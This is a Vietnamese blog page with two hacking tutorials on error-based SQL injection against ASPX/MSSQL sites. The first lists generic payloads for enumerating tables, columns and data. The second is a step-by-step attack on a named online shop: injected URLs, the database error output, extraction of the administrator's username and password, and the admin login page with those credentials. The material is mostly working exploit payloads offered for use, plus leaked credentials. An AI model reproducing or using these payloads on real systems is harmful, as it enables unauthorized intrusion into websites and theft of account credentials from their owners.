Home / SQL Injection
Hiển thị các bài đăng có nhãn SQL Injection. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn SQL Injection. Hiển thị tất cả bài đăng

23/3/16

Tut khai thác sql injection aspx

Tut khai thác sql injection aspx - doantn.hcmus.edu.vn, tut khai thác sql, cách khai thác sql dạng aspx, cách hack sql kiểu aspx

Giải thích : Site này thuộc dạng sql injection aspx.

Có rất nhiều dạng sql injection như : sql injection xpath, sql injection basic, sql injection DIOS, sql injection error based.

Cách để phân biệt các dạng đó mình sẽ nói chi tiết trong những bài sau (sau khi đã làm đủ video các dạng cho các bạn xem 



Câu lênh:
1. Show database
and 1=convert(int,(select top 1 table_name from information_schema.tables))– –
sẽ show ra table đầu tiên của site.

Sau đó chúng ta sẽ lần lượt show ra từng table 1 bằng câu lệnh
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in (‘table đã xuất hiện 1′,’table đã xuất hiện 2’)))–

Các bạn cứ điền dần như vậy cho đến khi tìm thấy hết toàn bộ table hoặc dò đến table mà mình cần get là đc.



2. Show Columns

and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name =(‘table cần get’)))–
Nếu các bạn muốn xem table tiếp theo thì dùng lệnh
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name =(‘table cần get’) and column_name not in (‘Column đã xuất hiện 1′,’Column đã xuất hiện 2’)))–

3. Show data

and 1=convert(int,(select top 1 Column_muốn_show from Table_của_column_đó–
End TUT
Pada Komentar

7/3/16

Tut Tấn công ASPX qua SQLi

Tut Tấn công ASPX qua SQLi

Tut Tấn công ASPX qua SQLi

Victim: http://www.hienshop.vn/

--------------------------------------------------
http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 table_name from information_schema.tables))/Default.aspx

Conversion failed when converting the nvarchar value 'tblCategory' to data type int.
=>> tblCategory
---------------------------------------------------
Có được "tblCategory" ta thay tiếp vào để lấy table tiếp theo

http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 table_name from information_schema.tables where table_name not in ('tblCategory')))/Default.aspx

Conversion failed when converting the nvarchar value 'tblComment' to data type int.
=>> tblComment
-------------------------------------------------
Có được "tblComment" ta lại thay vào tiếp như thế này

http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 table_name from information_schema.tables where table_name not in ('tblCategory', 'tblComment')))/Default.aspx

=>> Ta có "tblfooter"
-------------------------------------------------
Và ta thay tương tự như trên ta có

http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 table_name from information_schema.tables where table_name not in ('tblCategory', 'tblComment', 'tblfooter', 'tbllienhe', 'tblLogo', 'tblNews', 'tblOrder', 'tblOrderDetail')))/Default.aspx

=>> Vâng thông báo rất mất dạy, đéo được quá 260 từ. Thế thì sao, dùng kinh nghiệm đoán Table "thần chưởng". Tui thì đoán cmn đại là tblAdmin.


http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 column_name from information_schema.columns where table_name = 'tblAdmin'))/Default.aspx

CLGT này =>> AdminID
----------------------------------------------
Tới bước lấy thông tin User rồi:
http://www.hienshop.vn/ProductDetail/1672/198 and 1=convert(int,(select top 1 UserName from tblAdmin))//Default.aspx

=>> dnlong

Thay chổ "UserName" thành "PassWord"
http://www.hienshop.vn/ProductDetail/1672/198 and 1=convert(int,(select top 1 PassWord from tblAdmin))/Default.aspx

=>> Vẫn là dnlong
----------------------------------------------

Login Admin:

http://www.hienshop.vn/admin/Login.aspx

ID: dnlong
Pass: dnlong

Checked By Anh Hai Sài Gòn, Good Luck
Pada Komentar
Đăng ký: Bài đăng (Atom)